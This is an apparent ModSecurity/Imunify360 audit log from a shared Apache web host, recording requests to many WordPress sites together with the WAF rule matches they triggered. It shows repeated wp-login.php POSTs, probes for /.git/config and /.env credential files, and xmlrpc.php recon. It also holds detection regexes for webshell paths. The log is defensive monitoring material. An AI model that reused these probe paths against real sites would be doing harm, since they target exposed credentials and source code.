application/x-httpd-ea-php80___lsphp Stopwatch: 1751298452470616 2983234 (- - -) Stopwatch2: 1751298452470616 2983234; combined=2888, p1=93, p2=2635, p3=0, p4=0, p5=160, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --01e7c557-Z-- --303eed73-A-- [30/Jun/2025:21:17:35.464255 +0530] aGKxllqHigGvQG-1bcMyJQAAABo 188.166.88.13 62158 192.168.74.40 443 --303eed73-B-- POST //wp-login.php HTTP/1.1 Host: marketingservices.kutility.com Keep-Alive: 300 Connection: keep-alive Cookie: utm_source=deleted; utm_medium=deleted; utm_term=deleted; utm_content=deleted; utm_campaign=deleted; gclid=deleted; handl_original_ref=deleted; handl_landing_page=https%3A%2F%2Fmarketingservices.kutility.com%2F%2Fxmlrpc.php; handl_ip=188.166.88.13; handl_ref=deleted; handl_url=https%3A%2F%2Fmarketingservices.kutility.com%2F%2Fxmlrpc.php; email=deleted; username=deleted; wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 95 Accept-Language: en-US,en;q=0.5 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298453145224 6068096 (- - -) Stopwatch2: 1751298453145224 6068096; combined=6874, p1=139, p2=5840, p3=391, p4=9, p5=494, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --05a19955-Z-- --23917169-A-- [30/Jun/2025:21:17:39.270135 +0530] aGKxl3VjGudlwpQFhGN6sQAAADo 103.185.74.40 31072 192.168.74.40 443 --23917169-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --23917169-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --23917169-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298455668486 3602407 (- - -) Stopwatch2: 1751298455668486 3602407; combined=2623, p1=90, p2=2284, p3=0, p4=0, p5=249, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --23917169-Z-- --bbfbb96d-A-- [30/Jun/2025:21:17:39.287042 +0530] aGKxmt-UElwS6fqSGu4_RgAAAEg 188.166.88.13 52230 192.168.74.40 443 --bbfbb96d-B-- POST //wp-login.php HTTP/1.1 Host: raghuveergears.com Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 85 Accept-Language: en-US,en;q=0.5 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298459310779 186581 (- - -) Stopwatch2: 1751298459310779 186581; combined=9779, p1=132, p2=9113, p3=244, p4=6, p5=283, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --52923f59-Z-- --256e9927-A-- [30/Jun/2025:21:17:39.554365 +0530] aGKxl1i_NV0xgInTbBWlZAAAAD0 103.185.74.40 9726 192.168.74.40 443 --256e9927-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --256e9927-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --256e9927-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298455812215 3743056 (- - -) Stopwatch2: 1751298455812215 3743056; combined=6987, p1=140, p2=6616, p3=0, p4=0, p5=231, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --256e9927-Z-- --762beb00-A-- [30/Jun/2025:21:17:39.558390 +0530] aGKxm-LmhZtgtWVUq4HvmwAAAHM 188.166.88.13 61814 192.168.74.40 80 --762beb00-B-- POST /wp-login.php HTTP/1.1 Host: novemsol.com Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=ff9831fa6600d5e731e02b11ce611bff; wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 96 Accept-Language: en-US,en;q=0.5 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298458475669 3652066 (- - -) Stopwatch2: 1751298458475669 3652066; combined=9585, p1=175, p2=8666, p3=317, p4=7, p5=420, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b83a1f55-Z-- --d8108c05-A-- [30/Jun/2025:21:17:42.185297 +0530] aGKxm_Y1ABNXoIM8gyn3uwAAAAE 103.185.74.40 43394 192.168.74.40 443 --d8108c05-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --d8108c05-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d8108c05-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298459768732 2417507 (- - -) Stopwatch2: 1751298459768732 2417507; combined=3362, p1=123, p2=3068, p3=0, p4=0, p5=170, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d8108c05-Z-- --54d7b652-A-- [30/Jun/2025:21:17:42.200026 +0530] aGKxnaO12cK_VlXWiTB6NwAAAFY 188.166.88.13 52594 192.168.74.40 443 --54d7b652-B-- POST //wp-login.php HTTP/1.1 Host: rmhil.com Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 76 Accept-Language: en-US,en;q=0.5 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d48de818-Z-- --12e24205-A-- [30/Jun/2025:21:42:21.788815 +0530] aGK3ZUBlsNMqyv0UMUIevQAAABw 167.99.81.70 55386 192.168.74.40 80 --12e24205-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --12e24205-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --12e24205-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: default-handler Stopwatch: 1751299941782717 6363 (- - -) Stopwatch2: 1751299941782717 6363; combined=3761, p1=73, p2=3583, p3=0, p4=0, p5=104, sr=48, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --12e24205-Z-- --14eca95d-A-- [30/Jun/2025:21:42:21.817184 +0530] aGK3ZU3YNcohOUjGYGT9-wAAAAw 13.74.181.243 8197 192.168.74.40 80 --14eca95d-B-- GET /xmlrpc.php HTTP/1.1 Host: cvea.co.in --14eca95d-F-- HTTP/1.1 404 Not Found Content-Length: 315 Content-Type: text/html; charset=iso-8859-1 --14eca95d-H-- Message: String match "xmlrpc.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "166"] [id "77141064"] [msg "IM360 WAF: CMS Recon Bot detected||MVN:REQUEST_FILENAME||RSV:7.05||RS:0||T:APACHE||MV:/xmlrpc.php||RM:GET||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php72___lsphp Stopwatch: 1751299941812275 4981 (- - -) Stopwatch2: 1751299941812275 4981; combined=2976, p1=80, p2=2729, p3=70, p4=1, p5=96, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --14eca95d-Z-- --8752fe6c-A-- [30/Jun/2025:21:42:22.095282 +0530] aGK3ZrTriGQPsVfE9hfLrgAAADY 167.99.81.70 55388 192.168.74.40 80 --8752fe6c-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --8752fe6c-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --8752fe6c-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751299942091467 4077 (- - -) Stopwatch2: 1751299942091467 4077; combined=1150, p1=96, p2=601, p3=0, p4=0, p5=452, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8752fe6c-Z-- --9ac6704f-A-- [30/Jun/2025:21:42:22.312052 +0530] aGK3Zs_JQV6SIFvW0vdAUAAAADI 20.171.207.232 51040 192.168.74.40 443 --9ac6704f-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/js/hotels-jodhpur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --9ac6704f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --9ac6704f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/js/hotels-jodhpur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/js/hotels-jodhpur.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751299942297111 15767 (- - -) Stopwatch2: 1751299942297111 15767; combined=3538, p1=144, p2=3234, p3=0, p4=0, p5=159, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751300950973923 1949511 (- - -) Stopwatch2: 1751300950973923 1949511; combined=7678, p1=321, p2=6690, p3=251, p4=84, p5=332, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --17111a6e-Z-- --66dc6955-A-- [30/Jun/2025:21:59:17.345917 +0530] aGK7Xd-OASVgjzTipBewawAAACg 103.185.74.40 17431 192.168.74.40 443 --66dc6955-B-- POST /wp-cron.php?doing_wp_cron=1751300957.1114699840545654296875 HTTP/1.1 Host: sheikhamurad.adillusion.com User-Agent: WordPress/6.7.2; https://sheikhamurad.adillusion.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --66dc6955-C-- --66dc6955-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.5 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --66dc6955-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751300957.1114699840545654296875& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751300957324936 21202 (- - -) Stopwatch2: 1751300957324936 21202; combined=9110, p1=120, p2=7911, p3=307, p4=7, p5=765, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --66dc6955-Z-- --0bdde304-A-- [30/Jun/2025:21:59:22.858606 +0530] aGK7YpABMTJx07gDqJr84wAAACE 65.109.239.39 52764 192.168.74.40 443 --0bdde304-B-- GET /xmlrpc.php HTTP/1.1 Host: n-pillarsconstruction.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, zstd, br Accept-Language: nl-NL,nl;q=0.9 Content-Type: application/xml Referer: http://n-pillarsconstruction.com --0bdde304-F-- HTTP/1.1 404 Not Found Content-Length: 315 Content-Type: text/html; charset=iso-8859-1 --0bdde304-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b811040a-Z-- --f2484374-A-- [30/Jun/2025:22:08:50.789262 +0530] aGK9mr7AbQDDayuc_pwgbAAAACA 43.153.10.83 53248 192.168.74.40 80 --f2484374-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --f2484374-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --f2484374-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751301530782157 7547 (- - -) Stopwatch2: 1751301530782157 7547; combined=4424, p1=114, p2=4059, p3=85, p4=3, p5=163, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f2484374-Z-- --a6c0ac61-A-- [30/Jun/2025:22:08:51.097797 +0530] aGK9mOW3kuGijC1XetibfgAAAAU 49.51.72.76 55958 192.168.74.40 443 --a6c0ac61-B-- GET /wp-json/wp/v2/pages/404 HTTP/1.1 Host: sriselvalakshmihomecare.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --a6c0ac61-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 X-Robots-Tag: noindex X-Content-Type-Options: nosniff -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751301928023306 14116 (- - -) Stopwatch2: 1751301928023306 14116; combined=2849, p1=121, p2=2572, p3=0, p4=0, p5=155, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d0c3cb78-Z-- --90ecdf5a-A-- [30/Jun/2025:22:15:29.057351 +0530] aGK_KShW0y6BtZ8smLhvhQAAAAY 103.185.74.40 16327 192.168.74.40 443 --90ecdf5a-B-- POST /wp-cron.php?doing_wp_cron=1751301928.7696580886840820312500 HTTP/1.1 Host: vcharity.in User-Agent: WordPress/6.8.1; https://vcharity.in Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --90ecdf5a-C-- --90ecdf5a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --90ecdf5a-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751301928.7696580886840820312500& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751301929039120 18621 (- - -) Stopwatch2: 1751301929039120 18621; combined=6451, p1=111, p2=5704, p3=214, p4=4, p5=418, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --90ecdf5a-Z-- --afd4df26-A-- [30/Jun/2025:22:15:29.223093 +0530] aGK_KSkSecaCzZdwhdiFSwAAABw 20.171.207.232 44998 192.168.74.40 443 --afd4df26-B-- GET /https/aainag/images/testimonials/Rajasthan-Travel-Guides/aainag/Rajasthan-Travel-Guides/hotels-Mount-Abu.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --afd4df26-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --afd4df26-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751301937328493 16119 (- - -) Stopwatch2: 1751301937328493 16119; combined=3325, p1=149, p2=3017, p3=0, p4=0, p5=159, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ed582a04-Z-- --04b0f55e-A-- [30/Jun/2025:22:15:37.735188 +0530] aGK_MJ9z-4ap8ia7NQfwhQAAAAk 103.185.74.40 19130 192.168.74.40 443 --04b0f55e-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --04b0f55e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --04b0f55e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751301936440496 1295167 (- - -) Stopwatch2: 1751301936440496 1295167; combined=2521, p1=87, p2=2263, p3=0, p4=0, p5=171, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --04b0f55e-Z-- --a9903315-A-- [30/Jun/2025:22:15:38.480147 +0530] aGK_MikSecaCzZdwhdiFUwAAABw 20.171.207.232 44998 192.168.74.40 443 --a9903315-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/aaina/1/aainag/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --a9903315-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a9903315-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751301938461940 18325 (- - -) Stopwatch2: 1751301938461940 18325; combined=3669, p1=182, p2=3323, p3=0, p4=0, p5=164, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a9903315-Z-- --57aaac11-A-- [30/Jun/2025:22:15:39.140154 +0530] aGK_MZnOaVsQbbgcPUCHzwAAACo 103.185.74.40 62224 192.168.74.40 443 --57aaac11-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --57aaac11-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --57aaac11-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] 